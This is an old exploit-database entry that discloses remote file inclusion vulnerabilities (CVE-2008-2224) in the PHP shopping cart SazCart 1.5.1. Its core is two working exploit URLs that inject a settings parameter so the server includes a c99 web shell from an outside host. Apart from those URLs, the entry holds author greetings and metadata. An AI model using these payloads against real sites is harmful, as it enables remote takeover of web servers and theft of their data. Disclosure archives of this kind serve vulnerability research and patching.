SazCart 1.5.1 - Multiple Remote File Inclusions

Author: RoMaNcYxHaCkEr
type: webapps
platform: php
port: 
date_added: 2008-05-07 
date_updated:  
verified: 1 
codes: OSVDB-44890;CVE-2008-2224;OSVDB-44889 
tags: 
aliases:  
screenshot_url:  
application_url: 

-==========================================[ ViVa Islam + YeMeN ]====================================-

# Name : SazCart 1.5.1 Multiple Remote File Include Vulnerability

# Download From : http://www.sazcart.com/site/download.php?id=16

# Found By : RoMaNcYxHaCkEr     [RoMaNTiC-TeaM]  ( BlackxHat , BlackBox , aLwHEeD )

# Home Page :  www.4rxh.com     &         www.nb3.cc

+======================================================================================================================+

# Exploits :

* Must Be Register_Globals Is On

http://WwW.4RxH.CoM/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=http://rxh.freehostia.com/shells/c99in.txt?

http://WwW.4RxH.CoM/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://rxh.freehostia.com/shells/c99in.txt?

That,s It,s

Good Luck Everybody

+=======================================================================================================================+

# Greet To :

Tryag TeaM & All Members Of My Forum & Anyone Hate Me  :)

# For Contact : webmaster@4rxh.com

# bEST wISHES

-==========================================[ ViVa Islam + YeMeN ]====================================-

# milw0rm.com [2008-05-08]